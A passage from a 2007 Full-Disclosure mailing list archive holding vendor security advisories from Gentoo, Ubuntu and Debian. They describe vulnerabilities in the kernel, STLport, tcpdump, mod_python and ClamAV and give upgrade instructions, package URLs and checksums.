vulnerability is a local user denial of service (system crash) due to a bug in the key_alloc_serial() function. The second vulnerability is a local user attack in which a call to the listxattr() system call on a bad inode will at least corrupt memory in the calling process, and may allow a malicious program to read protected kernel memory (information exposure, possibly enabling other vulnerabilities), system crash, or even executing arbitrary code provided by the attacker. Bad inodes are not present on most systems, so in practice the attack will require that the user be able to mount a filesystem. From vorlon at gentoo.org Tue Mar 6 20:43:22 2007 From: vorlon at gentoo.org (Matthias Geerdsen) Date: Tue, 06 Mar 2007 21:43:22 +0100 Subject: [Full-disclosure] [ GLSA 200703-07 ] STLport: Possible remote execution of arbitrary code Message-ID: <45EDD26A.4040903@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: STLport: Possible remote execution of arbitrary code Date: March 06, 2007 Bugs: #165837 ID: 200703-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Two buffer overflows have been discovered in STLport possibly leading to the remote execution of arbitrary code. Background ========== STLport is a multi-platform C++ Standard Library implementation. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/STLport < 5.0.3 >= 5.0.3 Description =========== Two buffer overflows have been discovered, one in "print floats" and one in the rope constructor. Impact ====== Both of the buffer overflows could result in the remote execution of arbitrary code. Please note that the exploitability of the vulnerabilities depends on how the library is used by other software programs. Workaround ========== There is no known workaround at this time. Resolution ========== All STLport users should upgrade to the latest version. # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/STLport-5.0.3" References ========== [ 1 ] CVE-2007-0803 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0803 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 189 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/e043cc46/attachment.bin From kees at ubuntu.com Tue Mar 6 22:01:41 2007 From: kees at ubuntu.com (Kees Cook) Date: Tue, 6 Mar 2007 14:01:41 -0800 Subject: [Full-disclosure] [USN-429-1] tcpdump vulnerability Message-ID: <20070306220141.GH9621@outflux.net> =========================================================== Ubuntu Security Notice USN-429-1 March 06, 2007 tcpdump vulnerability CVE-2007-1218 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: tcpdump 3.9.1-1ubuntu1.1 Ubuntu 6.06 LTS: tcpdump 3.9.4-2ubuntu0.1 Ubuntu 6.10: tcpdump 3.9.4-4ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Moritz Jodeit discovered that tcpdump had an overflow in the 802.11 packet parser. Remote attackers could send specially crafted packets, crashing tcpdump, possibly leading to a denial of service. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1.diff.gz Size/MD5: 12037 9086124de1072e521624979a49a41749 http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1.dsc Size/MD5: 672 aa2dbeff2bbc288a8d98bff3d0743d10 http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1.orig.tar.gz Size/MD5: 662060 5f589a34be42d335176d1b8cfcbd1f6b amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_amd64.deb Size/MD5: 307150 324c0c4ae58717e2e0af4c3e251c72c9 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_i386.deb Size/MD5: 284880 05fcf0bd9f44a884cce9576f64593614 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_powerpc.deb Size/MD5: 294816 561ba6b77837204cd6cc9e088b77fccd sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.1-1ubuntu1.1_sparc.deb Size/MD5: 299920 d759b94205402352adb055af34a70ebd Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1.diff.gz Size/MD5: 10786 a46a8c2116b0e280127b0f4ca7f85c2b http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1.dsc Size/MD5: 685 21536cc080bd4dc72fdb0635349e29cc http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4.orig.tar.gz Size/MD5: 716862 4b64755bbc8ba1af49c747271a6df5b8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_amd64.deb Size/MD5: 312992 92e764c3084d0e9ed236afa956755fef i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_i386.deb Size/MD5: 289554 83a973219fcc4cb4edb27cb1c820666b powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_powerpc.deb Size/MD5: 301108 e810b1f74b8e8722cc81aa7bcf0ca64c sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-2ubuntu0.1_sparc.deb Size/MD5: 304888 59349548d64f1b8bb8b79018754bdf0d Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1.diff.gz Size/MD5: 10919 0fbd287a08757cfa3a9c52f12d8147e3 http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1.dsc Size/MD5: 632 283ba6bae274162eb64aa8039ebd4062 http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4.orig.tar.gz Size/MD5: 716862 4b64755bbc8ba1af49c747271a6df5b8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_amd64.deb Size/MD5: 314924 5aa45e116446876b771524b6631ab3a8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_i386.deb Size/MD5: 300618 de0caa6ea55db70547fa1cec2fd0056e powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_powerpc.deb Size/MD5: 303532 1c5dd389b720a339df581dd277d63d84 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tcpdump/tcpdump_3.9.4-4ubuntu0.1_sparc.deb Size/MD5: 308412 9c27ed7d8f42e0790902a985e687e5e1 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/23a016c5/attachment.bin From kees at ubuntu.com Tue Mar 6 22:05:34 2007 From: kees at ubuntu.com (Kees Cook) Date: Tue, 6 Mar 2007 14:05:34 -0800 Subject: [Full-disclosure] [USN-430-1] mod_python vulnerability Message-ID: <20070306220534.GI9621@outflux.net> =========================================================== Ubuntu Security Notice USN-430-1 March 06, 2007 libapache2-mod-python vulnerability CVE-2004-2680 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libapache2-mod-python 3.1.3-3ubuntu1.1 Ubuntu 6.06 LTS: libapache2-mod-python 3.1.4-0ubuntu1.1 After a standard system upgrade you need to restart Apache to effect the necessary changes. Details follow: Miles Egan discovered that mod_python, when used in output filter mode, did not handle output larger than 16384 bytes, and would display freed memory, possibly disclosing private data. Thanks to Jim Garrison of the Software Freedom Law Center for identifying the original bug as a security vulnerability. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3-3ubuntu1.1.diff.gz Size/MD5: 42855 1529fea7b05b869a360b6bc68d52386e http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3-3ubuntu1.1.dsc Size/MD5: 810 63072c8e787515557969a57119e5d4c5 http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3.orig.tar.gz Size/MD5: 293548 2e1983e35edd428f308b0dfeb1c23bfe Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python-doc_3.1.3-3ubuntu1.1_all.deb Size/MD5: 101052 02819855dfc2346b9582b8687b7ce3f3 http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.3-3ubuntu1.1_all.deb Size/MD5: 12890 29d8f3ad95844a81ef2bac9921be4ea2 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_amd64.deb Size/MD5: 88482 bbbc44abd50a165ae5df51d97c8b59f4 http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_amd64.deb Size/MD5: 88506 33430412a637252533673023a0eb556e i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_i386.deb Size/MD5: 80692 43cf25dacf95697200b50280ff4b1c74 http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_i386.deb Size/MD5: 80722 7003abb20896ed3d218febd92ad176c2 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_powerpc.deb Size/MD5: 85980 75be899b0568d8a332ac04ae820d955e http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_powerpc.deb Size/MD5: 86010 f706350855b692417a9d32f2c1962abd sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/liba/libapache2-mod-python/libapache2-mod-python2.3_3.1.3-3ubuntu1.1_sparc.deb Size/MD5: 82038 0b8d6e081d3e6506139a9fac4674d8ad http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.3-3ubuntu1.1_sparc.deb Size/MD5: 82078 71b5c528867eb166cd140a564d3fde0b Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4-0ubuntu1.1.diff.gz Size/MD5: 25348 f53b1e046220df8e1cdcf4cd602ac563 http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4-0ubuntu1.1.dsc Size/MD5: 769 41f6be106885d14e487317c57cc8e940 http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4.orig.tar.gz Size/MD5: 308510 607175958137b06bcda91110414c82a1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python-doc_3.1.4-0ubuntu1.1_all.deb Size/MD5: 113106 0b66fc0e0a15cbc6a57df85100e3ca62 http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python_3.1.4-0ubuntu1.1_all.deb Size/MD5: 13076 5488f0a55a436648c587e9a300d63881 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_amd64.deb Size/MD5: 88678 8542060889c4b3c32a6937070911bf33 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_i386.deb Size/MD5: 80676 13f3b9e1d7260ad8c34f7597954ed315 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_powerpc.deb Size/MD5: 85840 684789cb3c7acbeed9064200554d8da4 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/liba/libapache2-mod-python/libapache2-mod-python2.4_3.1.4-0ubuntu1.1_sparc.deb Size/MD5: 82000 297ab56501345f12ee9c6c0951287980 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/b0cb9418/attachment.bin From jmm at debian.org Tue Mar 6 22:33:56 2007 From: jmm at debian.org (Moritz Muehlenhoff) Date: Tue, 6 Mar 2007 23:33:56 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1263-1] New clamav packages fix denial of service Message-ID: <20070306223355.GA4090@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1263-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff March 6th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : clamav Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-0897 CVE-2007-0898 Debian Bug : 411118 Several remote vulnerabilities have been discovered in in the Clam anti-virus toolkit, which may lead to denial of service. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-0897 It was discovered that malformed CAB archives may exhaust file descriptors, which allows denial of service. CVE-2007-0898 It was discovered that a directory traversal vulnerability in the MIME header parser may lead to denial of service. For the stable distribution (sarge) these problems have been fixed in version 0.84-2.sarge.15. For the upcoming stable distribution (etch) these problems have been fixed in version 0.88.7-2. For the unstable distribution (sid) these problems have been fixed in version 0.90-1. We recommend that you upgrade your clamav packages. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15.dsc Size/MD5 checksum: 874 164ac3671dc1ede72f116703ff47f5c7 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15.diff.gz Size/MD5 checksum: 181092 4cb9909ef8d4d1da088a44a40a3d0a5d http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c Architecture independent components: http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.15_all.deb Size/MD5 checksum: 155290 d03243c2e40548b1ed8a7187dbbe05c0 http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.15_all.deb Size/MD5 checksum: 690908 6a35ca9ba3a2cccafe60ee6ba15dff30 http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.15_all.deb Size/MD5 checksum: 124274 50a76314d37beaa54c9939d01268a295 Alpha architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_alpha.deb Size/MD5 checksum: 74852 2f8ba776b5b8ecabb5ced89124df8711 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_alpha.deb Size/MD5 checksum: 48910 3c1e853f2c6cd9e75c1f88f9e607196c http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_alpha.deb Size/MD5 checksum: 2176498 f00a4e4a4724e7c278b356f74dcd6e9f http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_alpha.deb Size/MD5 checksum: 42160 1632e0df7ee729b9863ddd3deb70f57c http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_alpha.deb Size/MD5 checksum: 256108 8cd276b750093c23907973a9d3e80031 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_alpha.deb Size/MD5 checksum: 286304 85f2cd7418bb2bae13615499b52211fe AMD64 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_amd64.deb Size/MD5 checksum: 69010 5c1285590a4068fe6253145862a4ade9 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_amd64.deb Size/MD5 checksum: 44278 5b7a1bc8cd6034bbc5ea6b4af21c5adc http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_amd64.deb Size/MD5 checksum: 2173282 eedaa60dcb78037af56c2868aaa70a8a http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_amd64.deb Size/MD5 checksum: 40038 92967a280f254f2254851bed6f1dfd0f http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_amd64.deb Size/MD5 checksum: 176818 c76d900e5c2b6add3da38f4ef84adc2b http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_amd64.deb Size/MD5 checksum: 260378 b6b0304db0b1ac7306b43d854eb8a4d5 ARM architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_arm.deb Size/MD5 checksum: 63970 a8146a69333876298408f196c7b6de18 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_arm.deb Size/MD5 checksum: 39636 f3768da7d1f98159134b0d5375585567 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_arm.deb Size/MD5 checksum: 2171278 b728182250c04bb804c25150a1c008bc http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_arm.deb Size/MD5 checksum: 37320 1dbc35eb0c07bb0b19f83f002346462c http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_arm.deb Size/MD5 checksum: 175142 e1a4473d761f38ea9e22aeede630d8af http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_arm.deb Size/MD5 checksum: 250250 5be64956ab66d665a714dd889616d8a7 HP Precision architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_hppa.deb Size/MD5 checksum: 68470 75c8d1e6c3f6d20d8955178dc1f9a74d http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_hppa.deb Size/MD5 checksum: 43276 23d1c8cacac81c26942fb1fc91a57756 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_hppa.deb Size/MD5 checksum: 2173656 13c73779b34757f034a924aa72c589f3 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_hppa.deb Size/MD5 checksum: 39534 cc09b2a89978af3c674d3b908bac0ce6 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_hppa.deb Size/MD5 checksum: 202948 cd2bd9baaf5784217111a7527c085faa http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_hppa.deb Size/MD5 checksum: 283994 91570ebc055a4c6542369090b9c42833 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_i386.deb Size/MD5 checksum: 65324 27e131c923911d74c77b081081efd53b http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_i386.deb Size/MD5 checksum: 40372 302701e63dd3ed03f4d6df6be0ea9fda http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_i386.deb Size/MD5 checksum: 2171596 4df76765279396b0c35e5f08c45ed9ba http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_i386.deb Size/MD5 checksum: 38044 56981cfac9af7758ee3c9bfb900312e8 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_i386.deb Size/MD5 checksum: 159896 ae0b9dab053b2a5e14f795298b27a4dd http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_i386.deb Size/MD5 checksum: 255084 dce16317d32ee0c1fa89e7b881627ae3 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_ia64.deb Size/MD5 checksum: 81954 38e69159641cd1a96823bca6bd9dbe65 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_ia64.deb Size/MD5 checksum: 55336 5c9ed951a1c11eb69c99c4b896b79b8d http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_ia64.deb Size/MD5 checksum: 2180266 7d15c59e8b1c8514c654deab1902aed2 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_ia64.deb Size/MD5 checksum: 49252 9184c9e05f4bb5d42e8d837016065946 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_ia64.deb Size/MD5 checksum: 252442 936bbea0fb4950db7be9bb8a01164fc3 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_ia64.deb Size/MD5 checksum: 318470 07a022c3616a0a1b5ddc5f6acb132b50 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_m68k.deb Size/MD5 checksum: 62640 6315cbb887a6e57471451c8a4d930b51 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_m68k.deb Size/MD5 checksum: 38258 76d989cd3d071c5600d9239ec44d5e10 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_m68k.deb Size/MD5 checksum: 2170534 f35dcc6912fb0acd0b259acae8a9b9a2 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_m68k.deb Size/MD5 checksum: 35122 40b89cf394c25f79e17acc8dfb329b0d http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_m68k.deb Size/MD5 checksum: 146484 0098c6f52a629d5e1997ada7e752170e http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_m68k.deb Size/MD5 checksum: 251086 888c34801a5588dbc49f66e2acf1216a Big endian MIPS architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_mips.deb Size/MD5 checksum: 68062 9d6a26efae1f42e04162a5423ac317fb http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_mips.deb Size/MD5 checksum: 43874 f1cd8daafda6e91f288a8206d168f301 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_mips.deb Size/MD5 checksum: 2173058 6f5c70b355790ce6d4ff9c082e8506a3 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_mips.deb Size/MD5 checksum: 37682 a6706508bb4aaf8098968d60f8397be6 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_mips.deb Size/MD5 checksum: 195860 ea70cd36f235d4f2326307df22e06f69 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_mips.deb Size/MD5 checksum: 258188 9d874d790e66793797211be2a5a8ce86 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_mipsel.deb Size/MD5 checksum: 67650 9a9146d5667ccf4b111dd30d752f0a91 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_mipsel.deb Size/MD5 checksum: 43684 21fb06cf16611c12fdacdb8937ae92b1 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_mipsel.deb Size/MD5 checksum: 2173010 cc75d6c3f0f2fe5e597e79d547199a0f http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_mipsel.deb Size/MD5 checksum: 37996 3aeecfbf91fa68a8a2175ab5a1caa013 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_mipsel.deb Size/MD5 checksum: 192220 c612ee4b274d41ee7c7a2f7c06665958 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_mipsel.deb Size/MD5 checksum: 255722 66f071a933589d62c11c161a49015702 PowerPC architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_powerpc.deb Size/MD5 checksum: 69390 57c24e63fb8b9eee0ba65f82ebce29c5 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_powerpc.deb Size/MD5 checksum: 44732 b79f087c2d6b9a6a0443257dd664cd28 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_powerpc.deb Size/MD5 checksum: 2173690 c13fd5c3eb38db179db4db8a25017bd1 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_powerpc.deb Size/MD5 checksum: 38886 902c240c9ba87fb45d2018d6e7071b9e http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_powerpc.deb Size/MD5 checksum: 187852 cbfcd17a7acf154d92f2324aa6cc9bc3 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_powerpc.deb Size/MD5 checksum: 265522 5803d3f1b222cfd28229a2e47076bcae IBM S/390 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_s390.deb Size/MD5 checksum: 67960 8abf60927cc67e39c30af5147038457f http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_s390.deb Size/MD5 checksum: 43632 2087d0ad268f72be98b9c711543b4e15 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_s390.deb Size/MD5 checksum: 2172968 1e93b48d8eabf027a2885c44eeb2f694 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_s390.deb Size/MD5 checksum: 38974 15884fe049d94ea78d1392025734f719 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_s390.deb Size/MD5 checksum: 182844 894b86b7256a132a8c4d7ddf9adc3a0e http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_s390.deb Size/MD5 checksum: 270124 b804fa150e7e2c85e09ebb4fa5c15d8a Sun Sparc architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.15_sparc.deb Size/MD5 checksum: 64742 57b8bb2c49e2eb5360b8f105ed4b9f91 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.15_sparc.deb Size/MD5 checksum: 39522 59eb16c39f5c0dd52919b5fa3b2096fb http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.15_sparc.deb Size/MD5 checksum: 2171204 d66238ca67d4f22ff1145cf9ca393d9c http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.15_sparc.deb Size/MD5 checksum: 36890 5ffe48cc0fdea294f6382f73a668fe30 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.15_sparc.deb Size/MD5 checksum: 176144 1110fde33987418132d3ee6df0990ac8 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.15_sparc.deb Size/MD5 checksum: 265558 a2096ed70b830e852a72099dc9962641 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) 